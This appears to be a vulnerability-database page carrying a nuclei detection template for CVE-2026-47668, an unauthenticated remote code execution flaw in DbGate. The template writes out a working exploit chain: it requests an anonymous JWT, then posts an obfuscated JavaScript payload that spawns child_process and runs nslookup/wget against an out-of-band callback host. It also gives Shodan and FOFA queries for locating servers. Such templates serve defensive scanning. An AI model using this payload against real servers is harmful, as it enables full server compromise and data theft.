Lucene search
K

DbGate - Remote Code Execution via Anonymous JWT

🗓️ 15 Jun 2026 07:03:58Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

DbGate allows unauthenticated remote code execution via anonymous tokens.

Related
Refs
Code
id: CVE-2026-47668

info:
  name: DbGate - Remote Code Execution via Anonymous JWT
  author: benharvey-sage
  severity: critical
  description: |
   DbGate contains a remote code execution vulnerability exploitable by unauthenticated attackers. The /auth/login endpoint issues anonymous JWT tokens without credentials, and the /runners/start endpoint accepts JavaScript payloads that execute via Node.js child_process, allowing arbitrary command execution on the server.
  impact: |
   An unauthenticated attacker can execute arbitrary system commands on the server with the privileges of the DbGate process, leading to full server compromise, data exfiltration from connected databases, lateral movement, and deployment of backdoors or ransomware.
  remediation: |
   Update DbGate to the latest patched version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2026-47668
    - https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc
    - https://github.com/dbgate/dbgate
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-47668
    epss-score: 0.00336
    epss-percentile: 0.5697
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: dbgate
    product: dbgate
    shodan-query: http.title:"DbGate"
    fofa-query: title="DbGate"
  tags: cve,cve2026,dbgate,rce,oast,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"amoid":"none"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "accessToken")'
        internal: true
        condition: and

    extractors:
      - type: json
        name: access_token
        part: body
        internal: true
        json:
          - '.accessToken'

  - raw:
      - |
        POST /runners/start HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{access_token}}
        Content-Type: application/json

        {"script":{"type":"json","commands":[{"type":"assign","variableName":"x","functionName":"x;try{var m=process.mainModule;var r=m[\"req\"+\"uire\"];var n=[\"chi\",\"ld_\",\"pro\",\"ces\",\"s\"].join(\"\");var cp=r(n);var o=cp[\"exe\"+\"cSy\"+\"nc\"](\"nslookup {{interactsh-url}} || wget {{interactsh-url}}\").toString();}catch(e){};// ","props":{}}],"packageNames":[]}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and
# digest: 490a0046304402202780e3b0b6a5e6f55dfc20eb2cd2f4f4463fd0c91899561ed8d2d9411dd46d050220174e242f7b558a4ce7f24647b9ece45d598881f3c58fddfabed41ba6015116d4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2026 13:24Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00336
11